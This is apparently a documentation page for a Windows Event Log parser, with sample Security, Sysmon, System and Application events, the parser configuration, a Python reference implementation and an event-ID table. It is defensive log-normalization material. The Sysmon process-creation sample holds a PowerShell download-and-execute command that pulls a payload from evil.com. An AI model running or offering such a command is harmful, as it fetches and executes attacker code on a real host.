Parser Example
Windows Event Channel
Overview
The parser handles Windows Event Logs in JSON form from the following Event Channels:
- Security: Authentication, Authorization, Account Management (Event ID 4624, 4625, 4648, 4720, 4722, 4732, etc.)
- System: System startup/shutdown, Driver events, Service events
- Application: Application errors, warnings, events
- Microsoft-Windows-Sysmon/Operational: Process creation, Network connections, File operations
Sample Logs
1. Security - Successful Logon (Event ID 4624)
{"timestamp":"2026-03-17T10:30:45.123Z","host":"DC01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Security-Auditing\",\"@Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:30:45.123Z\"},\"EventRecordID\":\"123456\",\"Channel\":\"Security\",\"Computer\":\"DC01.corp.local\"},\"EventData\":{\"SubjectUserSid\":\"S-1-5-18\",\"SubjectUserName\":\"DC01$\",\"SubjectDomainName\":\"CORP\",\"SubjectLogonId\":\"0x3e7\",\"TargetUserSid\":\"S-1-5-21-123456789-1234567890-1234567890-1001\",\"TargetUserName\":\"admin.user\",\"TargetDomainName\":\"CORP\",\"TargetLogonId\":\"0x1a2b3c4d\",\"LogonType\":\"10\",\"LogonProcessName\":\"User32\",\"AuthenticationPackageName\":\"Negotiate\",\"WorkstationName\":\"WORKSTATION01\",\"IpAddress\":\"192.168.1.100\",\"IpPort\":\"52431\",\"ProcessId\":\"0x1234\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}}}"}
2. Security - Failed Logon (Event ID 4625)
{"timestamp":"2026-03-17T10:31:15.456Z","host":"DC01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Security-Auditing\"},\"EventID\":\"4625\",\"Level\":\"0\",\"Task\":\"12544\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:31:15.456Z\"},\"EventRecordID\":\"123457\",\"Channel\":\"Security\",\"Computer\":\"DC01.corp.local\"},\"EventData\":{\"SubjectUserSid\":\"S-1-0-0\",\"SubjectUserName\":\"-\",\"TargetUserSid\":\"S-1-0-0\",\"TargetUserName\":\"hacker\",\"TargetDomainName\":\"CORP\",\"Status\":\"0xc000006d\",\"FailureReason\":\"%%2313\",\"SubStatus\":\"0xc000006a\",\"LogonType\":\"3\",\"LogonProcessName\":\"NtLmSsp\",\"AuthenticationPackageName\":\"NTLM\",\"WorkstationName\":\"ATTACKER-PC\",\"IpAddress\":\"10.0.0.55\",\"IpPort\":\"44521\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\"}}}"}
3. Security - User Account Created (Event ID 4720)
{"timestamp":"2026-03-17T10:35:22.789Z","host":"DC01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Security-Auditing\"},\"EventID\":\"4720\",\"Level\":\"0\",\"Task\":\"13824\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:35:22.789Z\"},\"EventRecordID\":\"123458\",\"Channel\":\"Security\",\"Computer\":\"DC01.corp.local\"},\"EventData\":{\"TargetUserName\":\"newuser\",\"TargetDomainName\":\"CORP\",\"TargetSid\":\"S-1-5-21-123456789-1234567890-1234567890-1102\",\"SubjectUserSid\":\"S-1-5-21-123456789-1234567890-1234567890-500\",\"SubjectUserName\":\"Administrator\",\"SubjectDomainName\":\"CORP\",\"SubjectLogonId\":\"0x1234abcd\",\"PrivilegeList\":\"-\",\"SamAccountName\":\"newuser\",\"DisplayName\":\"New User\",\"UserPrincipalName\":\"newuser@corp.local\",\"HomeDirectory\":\"-\",\"HomePath\":\"-\",\"ScriptPath\":\"-\",\"ProfilePath\":\"-\",\"UserWorkstations\":\"-\",\"PasswordLastSet\":\"%%1793\",\"AccountExpires\":\"%%1794\",\"PrimaryGroupId\":\"513\",\"AllowedToDelegateTo\":\"-\",\"OldUacValue\":\"0x0\",\"NewUacValue\":\"0x15\",\"UserAccountControl\":\"%%2080 %%2082 %%2084\",\"UserParameters\":\"-\",\"SidHistory\":\"-\",\"LogonHours\":\"%%1793\"}}}"}
4. Sysmon - Process Creation (Event ID 1)
{"timestamp":"2026-03-17T10:40:33.012Z","host":"WORKSTATION01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Microsoft-Windows-Sysmon\",\"@Guid\":\"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:40:33.012Z\"},\"EventRecordID\":\"654321\",\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"WORKSTATION01.corp.local\"},\"EventData\":{\"RuleName\":\"technique_id=T1059.001,technique_name=PowerShell\",\"UtcTime\":\"2026-03-17 10:40:33.012\",\"ProcessGuid\":\"{12345678-abcd-1234-efgh-123456789012}\",\"ProcessId\":\"4576\",\"Image\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"FileVersion\":\"10.0.19041.1\",\"Description\":\"Windows PowerShell\",\"Product\":\"Microsoft® Windows® Operating System\",\"Company\":\"Microsoft Corporation\",\"OriginalFileName\":\"PowerShell.EXE\",\"CommandLine\":\"powershell.exe -ep bypass -nop -c \\\"IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')\\\"\",\"CurrentDirectory\":\"C:\\\\Users\\\\victim\\\\Desktop\\\\\",\"User\":\"CORP\\\\victim\",\"LogonGuid\":\"{12345678-1111-2222-3333-444444444444}\",\"LogonId\":\"0x5678\",\"TerminalSessionId\":\"1\",\"IntegrityLevel\":\"High\",\"Hashes\":\"MD5=D57D03D81D1B85F0E0CF40E8E5B1F8A8,SHA256=0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\",\"ParentProcessGuid\":\"{12345678-aaaa-bbbb-cccc-dddddddddddd}\",\"ParentProcessId\":\"3456\",\"ParentImage\":\"C:\\\\Windows\\\\explorer.exe\",\"ParentCommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\",\"ParentUser\":\"CORP\\\\victim\"}}}"}
5. System - Service Start/Stop (Event ID 7036)
{"timestamp":"2026-03-17T10:45:55.234Z","host":"SERVER01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Service Control Manager\",\"@Guid\":\"{555908d1-a6d7-4695-8e1e-26931d2012f4}\",\"@EventSourceName\":\"Service Control Manager\"},\"EventID\":{\"#text\":\"7036\",\"@Qualifiers\":\"16384\"},\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:45:55.234Z\"},\"EventRecordID\":\"789012\",\"Channel\":\"System\",\"Computer\":\"SERVER01.corp.local\"},\"EventData\":{\"param1\":\"Windows Update\",\"param2\":\"running\"}}}"}
6. Application - Application Error (Event ID 1000)
{"timestamp":"2026-03-17T10:50:12.567Z","host":"WORKSTATION01","message":"{\"Event\":{\"System\":{\"Provider\":{\"@Name\":\"Application Error\"},\"EventID\":{\"#text\":\"1000\",\"@Qualifiers\":\"0\"},\"Level\":\"2\",\"Task\":\"100\",\"TimeCreated\":{\"@SystemTime\":\"2026-03-17T10:50:12.567Z\"},\"EventRecordID\":\"456789\",\"Channel\":\"Application\",\"Computer\":\"WORKSTATION01.corp.local\"},\"EventData\":{\"Data\":[\"notepad.exe\",\"10.0.19041.1\",\"12345678\",\"ntdll.dll\",\"10.0.19041.1234\",\"87654321\",\"c0000005\",\"00012345\",\"1234\",\"01234567890abcdef\",\"C:\\\\Windows\\\\System32\\\\notepad.exe\",\"C:\\\\Windows\\\\System32\\\\ntdll.dll\",\"12345678-1234-1234-1234-123456789012\"]}}}"}
Parser Configuration
#regex
#conditional
event_timestamp = ""
if (ts, err = to_string(.timestamp); err == null) { event_timestamp = ts }
host_hostname = ""
event_id = ""
event_code = ""
event_provider = ""
event_channel = ""
event_category = ""
event_action = ""
event_outcome = ""
event_severity = 0
event_severity_label = ""
event_module = "windows"
log_level = "info"
source_ip = ""
source_port = ""
user_id = ""
user_name = ""
user_domain = ""
target_user_name = ""
target_user_domain = ""
target_user_id = ""
process_pid = ""
process_name = ""
process_executable = ""
process_command_line = ""
process_working_directory = ""
process_parent_pid = ""
process_parent_name = ""
process_parent_command_line = ""
process_entity_id = ""
file_hash_md5 = ""
file_hash_sha256 = ""
host_str = ""
if (h, err = to_string(.host); err == null) { host_str = h }
host_hostname = host_str
msg_str = ""
if (m, err = to_string(.message); err == null) { msg_str = m }
parsed_event = {}
if (pe, err = parse_json(msg_str); err == null) {
parsed_event = pe
}
event_obj = {}
if (ev, err = to_string(parsed_event.Event); err == null) {
if ev != "" {
event_obj = parsed_event.Event
}
}
system_obj = {}
if (sys, err = to_string(event_obj.System); err == null) {
if sys != "" {
system_obj = event_obj.System
}
}
event_data_obj = {}
if (ed, err = to_string(event_obj.EventData); err == null) {
if ed != "" {
event_data_obj = event_obj.EventData
}
}
if (provider_m, err = parse_regex(msg_str, r'"@Name":"(?P<name>[^"]+)"'); err == null) {
event_provider = provider_m.name
}
if (eventid_m, err = parse_regex(msg_str, r'"EventID":"(?P<id>\d+)"'); err == null) {
event_id = eventid_m.id
event_code = eventid_m.id
}
if (eventid_m2, err = parse_regex(msg_str, r'"EventID":\{"#text":"(?P<id>\d+)"'); err == null) {
event_id = eventid_m2.id
event_code = eventid_m2.id
}
if (channel_m, err = parse_regex(msg_str, r'"Channel":"(?P<channel>[^"]+)"'); err == null) {
event_channel = to_string(channel_m.channel)
}
if (computer_m, err = parse_regex(msg_str, r'"Computer":"(?P<computer>[^"]+)"'); err == null) {
host_hostname = to_string(computer_m.computer)
}
if (level_m, err = parse_regex(msg_str, r'"Level":"(?P<level>\d+)"'); err == null) {
level_str = to_string(level_m.level)
if level_str == "1" { log_level = "critical"; event_severity_label = "critical"; event_severity = 1 }
if level_str == "2" { log_level = "error"; event_severity_label = "error"; event_severity = 2 }
if level_str == "3" { log_level = "warning"; event_severity_label = "warning"; event_severity = 3 }
if level_str == "4" { log_level = "info"; event_severity_label = "info"; event_severity = 4 }
if level_str == "5" { log_level = "debug"; event_severity_label = "verbose"; event_severity = 5 }
}
channel_str = to_string(event_channel)
if contains(channel_str, "Security") {
event_module = "windows.security"
if event_id == "4624" {
event_category = "authentication"
event_action = "logon_success"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (target_sid_m, err = parse_regex(msg_str, r'"TargetUserSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = target_sid_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
if (subject_sid_m, err = parse_regex(msg_str, r'"SubjectUserSid":"(?P<sid>[^"]+)"'); err == null) {
user_id = subject_sid_m.sid
}
if (ip_m, err = parse_regex(msg_str, r'"IpAddress":"(?P<ip>[^"]+)"'); err == null) {
source_ip = ip_m.ip
}
if (port_m, err = parse_regex(msg_str, r'"IpPort":"(?P<port>[^"]+)"'); err == null) {
source_port = port_m.port
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>[^"]+)"'); err == null) {
process_pid = procid_m.pid
}
if (procname_m, err = parse_regex(msg_str, r'"ProcessName":"(?P<name>[^"]+)"'); err == null) {
process_executable = procname_m.name
}
}
if event_id == "4625" {
event_category = "authentication"
event_action = "logon_failed"
event_outcome = "failure"
log_level = "warning"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (ip_m, err = parse_regex(msg_str, r'"IpAddress":"(?P<ip>[^"]+)"'); err == null) {
source_ip = ip_m.ip
}
if (port_m, err = parse_regex(msg_str, r'"IpPort":"(?P<port>[^"]+)"'); err == null) {
source_port = port_m.port
}
if (workstation_m, err = parse_regex(msg_str, r'"WorkstationName":"(?P<ws>[^"]+)"'); err == null) {
if workstation_m.ws != "-" {
if host_hostname == host_str { host_hostname = workstation_m.ws }
}
}
}
if event_id == "4648" {
event_category = "authentication"
event_action = "explicit_credentials"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
}
if event_id == "4720" {
event_category = "iam"
event_action = "user_created"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (target_domain_m, err = parse_regex(msg_str, r'"TargetDomainName":"(?P<domain>[^"]+)"'); err == null) {
target_user_domain = target_domain_m.domain
}
if (target_sid_m, err = parse_regex(msg_str, r'"TargetSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = target_sid_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
}
if event_id == "4722" {
event_category = "iam"
event_action = "user_enabled"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4725" {
event_category = "iam"
event_action = "user_disabled"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4726" {
event_category = "iam"
event_action = "user_deleted"
event_outcome = "success"
if (target_user_m, err = parse_regex(msg_str, r'"TargetUserName":"(?P<user>[^"]+)"'); err == null) {
target_user_name = target_user_m.user
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4732" {
event_category = "iam"
event_action = "group_member_added"
event_outcome = "success"
if (member_m, err = parse_regex(msg_str, r'"MemberSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = member_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4733" {
event_category = "iam"
event_action = "group_member_removed"
event_outcome = "success"
if (member_m, err = parse_regex(msg_str, r'"MemberSid":"(?P<sid>[^"]+)"'); err == null) {
target_user_id = member_m.sid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
if event_id == "4688" {
event_category = "process"
event_action = "process_created"
event_outcome = "success"
if (newprocname_m, err = parse_regex(msg_str, r'"NewProcessName":"(?P<name>[^"]+)"'); err == null) {
process_executable = newprocname_m.name
}
if (newprocid_m, err = parse_regex(msg_str, r'"NewProcessId":"(?P<pid>[^"]+)"'); err == null) {
process_pid = newprocid_m.pid
}
if (cmdline_m, err = parse_regex(msg_str, r'"CommandLine":"(?P<cmd>(?:[^"\\]|\\.)*)"'); err == null) {
process_command_line = cmdline_m.cmd
}
if (parentprocname_m, err = parse_regex(msg_str, r'"ParentProcessName":"(?P<name>[^"]+)"'); err == null) {
process_parent_name = parentprocname_m.name
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
if (subject_domain_m, err = parse_regex(msg_str, r'"SubjectDomainName":"(?P<domain>[^"]+)"'); err == null) {
user_domain = subject_domain_m.domain
}
}
if event_id == "4689" {
event_category = "process"
event_action = "process_terminated"
event_outcome = "success"
if (procname_m, err = parse_regex(msg_str, r'"ProcessName":"(?P<name>[^"]+)"'); err == null) {
process_executable = procname_m.name
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>[^"]+)"'); err == null) {
process_pid = procid_m.pid
}
if (subject_user_m, err = parse_regex(msg_str, r'"SubjectUserName":"(?P<user>[^"]+)"'); err == null) {
user_name = subject_user_m.user
}
}
}
if contains(channel_str, "Sysmon") {
event_module = "windows.sysmon"
if event_id == "1" {
event_category = "process"
event_action = "process_created"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
if (cmdline_m, err = parse_regex(msg_str, r'"CommandLine":"(?P<cmd>(?:[^"\\]|\\.)*)"'); err == null) {
process_command_line = cmdline_m.cmd
}
if (cwd_m, err = parse_regex(msg_str, r'"CurrentDirectory":"(?P<cwd>[^"]+)"'); err == null) {
process_working_directory = cwd_m.cwd
}
if (user_m, err = parse_regex(msg_str, r'"User":"(?P<user>[^"]+)"'); err == null) {
user_str = user_m.user
if (domain_user_m, err = parse_regex(user_str, r'(?P<domain>[^\\]+)\\+(?P<name>.+)'); err == null) {
user_domain = domain_user_m.domain
user_name = domain_user_m.name
}
}
if (pguid_m, err = parse_regex(msg_str, r'"ProcessGuid":"(?P<guid>[^"]+)"'); err == null) {
process_entity_id = pguid_m.guid
}
if (parentid_m, err = parse_regex(msg_str, r'"ParentProcessId":"(?P<pid>\d+)"'); err == null) {
process_parent_pid = parentid_m.pid
}
if (parentimage_m, err = parse_regex(msg_str, r'"ParentImage":"(?P<image>[^"]+)"'); err == null) {
process_parent_name = parentimage_m.image
}
if (parentcmd_m, err = parse_regex(msg_str, r'"ParentCommandLine":"(?P<cmd>(?:[^"\\]|\\.)*)"'); err == null) {
process_parent_command_line = parentcmd_m.cmd
}
if (hashes_m, err = parse_regex(msg_str, r'"Hashes":"(?P<hashes>[^"]+)"'); err == null) {
hash_str = hashes_m.hashes
if (md5_m, err = parse_regex(hash_str, r'MD5=(?P<md5>[A-Fa-f0-9]+)'); err == null) {
file_hash_md5 = md5_m.md5
}
if (sha256_m, err = parse_regex(hash_str, r'SHA256=(?P<sha256>[A-Fa-f0-9]+)'); err == null) {
file_hash_sha256 = sha256_m.sha256
}
}
}
if event_id == "3" {
event_category = "network"
event_action = "network_connection"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
if (srcip_m, err = parse_regex(msg_str, r'"SourceIp":"(?P<ip>[^"]+)"'); err == null) {
source_ip = srcip_m.ip
}
if (srcport_m, err = parse_regex(msg_str, r'"SourcePort":"(?P<port>\d+)"'); err == null) {
source_port = srcport_m.port
}
if (user_m, err = parse_regex(msg_str, r'"User":"(?P<user>[^"]+)"'); err == null) {
user_str = user_m.user
if (domain_user_m, err = parse_regex(user_str, r'(?P<domain>[^\\]+)\\+(?P<name>.+)'); err == null) {
user_domain = domain_user_m.domain
user_name = domain_user_m.name
}
}
}
if event_id == "5" {
event_category = "process"
event_action = "process_terminated"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
}
if event_id == "11" {
event_category = "file"
event_action = "file_created"
event_outcome = "success"
if (image_m, err = parse_regex(msg_str, r'"Image":"(?P<image>[^"]+)"'); err == null) {
process_executable = image_m.image
}
if (procid_m, err = parse_regex(msg_str, r'"ProcessId":"(?P<pid>\d+)"'); err == null) {
process_pid = procid_m.pid
}
}
}
if contains(channel_str, "System") {
event_module = "windows.system"
if event_id == "7036" {
event_category = "host"
event_action = "service_state_change"
event_outcome = "success"
}
if event_id == "7045" {
event_category = "host"
event_action = "service_installed"
event_outcome = "success"
}
if event_id == "6005" {
event_category = "host"
event_action = "system_startup"
event_outcome = "success"
}
if event_id == "6006" {
event_category = "host"
event_action = "system_shutdown"
event_outcome = "success"
}
}
if contains(channel_str, "Application") {
event_module = "windows.application"
if event_id == "1000" {
event_category = "process"
event_action = "application_error"
event_outcome = "failure"
log_level = "error"
}
if event_id == "1001" {
event_category = "process"
event_action = "application_crash"
event_outcome = "failure"
log_level = "error"
}
}
if event_category == "" { event_category = "host" }
if event_action == "" { event_action = "info" }
if event_outcome == "" { event_outcome = "unknown" }
#normalize
timestamp: format_timestamp!(parse_timestamp!(event_timestamp, "%Y-%m-%dT%H:%M:%S.%3fZ"), "%Y-%m-%d %H:%M:%S")
event.module: event_module
event.provider: event_provider
event.code: event_code
event.category: event_category
event.action: event_action
event.outcome: event_outcome
event.severity: event_severity
event.severity_label: event_severity_label
log.level: log_level
message: msg_str
host.hostname: host_hostname
source.ip: source_ip
source.port: source_port
user.id: user_id
user.name: user_name
user.domain: user_domain
user.target.id: target_user_id
user.target.name: target_user_name
user.target.domain: target_user_domain
process.pid: process_pid
process.name: process_name
process.executable: process_executable
process.command_line: process_command_line
process.working_directory: process_working_directory
process.parent.pid: process_parent_pid
process.parent.name: process_parent_name
process.parent.command_line: process_parent_command_line
process.entity_id: process_entity_id
file.hash.md5: file_hash_md5
file.hash.sha256: file_hash_sha256
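The following is an added reference implementation in Python and is not part of the original parser configuration. It performs the same normalization by decoding both JSON layers with `json.loads` and reading fields from the resulting objects, instead of running regexes over the inner JSON text while it is still escaped. It covers a subset of the EventID mapping from the parser above (the remaining rows follow the same pattern), handles the `{"#text": ...}` form of `EventID` seen in the 7036 sample, splits Sysmon's `DOMAIN\user` value and the `Hashes` string, and includes a `regex_field` helper that shows what the regex-on-escaped-text approach returns for values containing backslashes or quotes. The three sample lines are constructed here in the page's two-layer format; the output field names (`user.target.name`, `process.executable`, and so on) are the ones used in the `#normalize` section.

```python
import json
import re

# (channel keyword, EventID) -> (category, action, outcome), taken from the parser above;
# the remaining rows of the page's Event Categories table follow the same pattern.
EVENT_MAP = {
    ("Security", "4624"): ("authentication", "logon_success", "success"),
    ("Security", "4625"): ("authentication", "logon_failed", "failure"),
    ("Security", "4720"): ("iam", "user_created", "success"),
    ("Security", "4688"): ("process", "process_created", "success"),
    ("Sysmon", "1"): ("process", "process_created", "success"),
    ("Sysmon", "3"): ("network", "network_connection", "success"),
    ("Sysmon", "11"): ("file", "file_created", "success"),
    ("System", "7036"): ("host", "service_state_change", "success"),
    ("Application", "1000"): ("process", "application_error", "failure"),
}
LEVELS = {"1": "critical", "2": "error", "3": "warning", "4": "info", "5": "verbose"}
CHANNEL_KEYS = ("Security", "Sysmon", "System", "Application")

def event_id_of(system):
    """EventID is a bare string for manifest-based providers and
    {"#text": ..., "@Qualifiers": ...} for classic ones (the 7036 sample)."""
    eid = system.get("EventID", "")
    if isinstance(eid, dict):
        eid = eid.get("#text", "")
    return str(eid)

def split_domain_user(value):
    """'CORP\\victim' -> ('CORP', 'victim'); expects the decoded value, not JSON text."""
    domain, sep, name = value.partition("\\")
    return (domain, name) if sep else ("", value)

def parse_hashes(value):
    """Sysmon 'MD5=..,SHA256=..' -> {'MD5': .., 'SHA256': ..}."""
    out = {}
    for part in value.split(","):
        algo, sep, digest = part.partition("=")
        if sep:
            out[algo.strip()] = digest.strip()
    return out

def normalize(line):
    """Decode both JSON layers and emit the normalized field names used above."""
    outer = json.loads(line)
    event = json.loads(outer["message"]).get("Event", {})
    system = event.get("System", {})
    data = event.get("EventData") or {}
    eid = event_id_of(system)
    key = next((k for k in CHANNEL_KEYS if k in system.get("Channel", "")), "")
    category, action, outcome = EVENT_MAP.get((key, eid), ("host", "info", "unknown"))
    ev = {
        "event.module": "windows." + key.lower() if key else "windows",
        "event.provider": system.get("Provider", {}).get("@Name", ""),
        "event.code": eid,
        "event.category": category,
        "event.action": action,
        "event.outcome": outcome,
        "event.severity_label": LEVELS.get(str(system.get("Level", "")), ""),
        "host.hostname": system.get("Computer") or outer.get("host", ""),
        "source.ip": data.get("IpAddress") or data.get("SourceIp", ""),
        "process.executable": data.get("Image") or data.get("NewProcessName") or data.get("ProcessName", ""),
        "process.command_line": data.get("CommandLine", ""),
        "user.target.name": data.get("TargetUserName", ""),
    }
    # Security events split the subject into Name/Domain; Sysmon packs both into "User".
    if "User" in data:
        ev["user.domain"], ev["user.name"] = split_domain_user(data["User"])
    else:
        ev["user.name"] = data.get("SubjectUserName", "")
        ev["user.domain"] = data.get("SubjectDomainName", "")
    hashes = parse_hashes(data.get("Hashes", ""))
    ev["file.hash.md5"] = hashes.get("MD5", "")
    ev["file.hash.sha256"] = hashes.get("SHA256", "")
    return ev

def regex_field(line, key):
    """The page's regex pattern run on the still-escaped inner JSON text: backslashes
    come back doubled, and an escaped quote inside the value cuts the match short."""
    m = re.search(r'"%s":"(?P<v>[^"]+)"' % key, json.loads(line)["message"])
    return m.group("v") if m else ""

def _sample(host, system, event_data):
    # Constructed sample in the page's two-layer format (compact inner JSON, like the samples above).
    inner = {"Event": {"System": system, "EventData": event_data}}
    return json.dumps({"timestamp": "2026-03-17T10:40:33.012Z", "host": host,
                       "message": json.dumps(inner, separators=(",", ":"))})

SAMPLE_4624 = _sample("DC01",
    {"Provider": {"@Name": "Microsoft-Windows-Security-Auditing"}, "EventID": "4624",
     "Level": "0", "Channel": "Security", "Computer": "DC01.corp.local"},
    {"SubjectUserName": "DC01$", "SubjectDomainName": "CORP", "TargetUserName": "admin.user",
     "TargetDomainName": "CORP", "IpAddress": "192.168.1.100",
     "ProcessName": "C:\\Windows\\System32\\svchost.exe"})
SAMPLE_SYSMON_1 = _sample("WORKSTATION01",
    {"Provider": {"@Name": "Microsoft-Windows-Sysmon"}, "EventID": "1", "Level": "4",
     "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "WORKSTATION01.corp.local"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": 'powershell.exe -c "Get-Process"', "User": "CORP\\victim",
     "Hashes": "MD5=D57D03D81D1B85F0E0CF40E8E5B1F8A8,SHA256=" + "0123456789ABCDEF" * 4})
SAMPLE_7036 = _sample("SERVER01",
    {"Provider": {"@Name": "Service Control Manager"}, "Level": "4", "Channel": "System",
     "EventID": {"#text": "7036", "@Qualifiers": "16384"}, "Computer": "SERVER01.corp.local"},
    {"param1": "Windows Update", "param2": "running"})

if __name__ == "__main__":
    for sample in (SAMPLE_4624, SAMPLE_SYSMON_1, SAMPLE_7036):
        print(json.dumps(normalize(sample), indent=1))
    print("regex CommandLine:", repr(regex_field(SAMPLE_SYSMON_1, "CommandLine")))
```

Because `message` is itself a JSON document, the text the `#regex` patterns see still carries JSON escaping: `C:\\Windows` appears with doubled backslashes and an embedded quote appears as `\"`. Reading the fields after `json.loads` (or, in the parser above, from `parsed_event.Event.EventData` rather than `msg_str`) avoids both problems; `regex_field` exists only to make that difference visible on the Sysmon sample.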
Event Categories
| Event ID | Channel | Category | Description |
|---|---|---|---|
| 4624 | Security | authentication | Successful logon |
| 4625 | Security | authentication | Failed logon |
| 4648 | Security | authentication | Logon using explicit credentials |
| 4720 | Security | iam | User account created |
| 4722 | Security | iam | User account enabled |
| 4725 | Security | iam | User account disabled |
| 4726 | Security | iam | User account deleted |
| 4732 | Security | iam | Member added to security-enabled group |
| 4733 | Security | iam | Member removed from security-enabled group |
| 4688 | Security | process | New process created |
| 4689 | Security | process | Process terminated |
| 1 | Sysmon | process | Process creation |
| 3 | Sysmon | network | Network connection |
| 5 | Sysmon | process | Process terminated |
| 11 | Sysmon | file | File created |
| 7036 | System | host | Service state change |
| 7045 | System | host | Service installed |
| 6005 | System | host | System startup |
| 6006 | System | host | System shutdown |
| 1000 | Application | process | Application error |
| 1001 | Application | process | Application crash |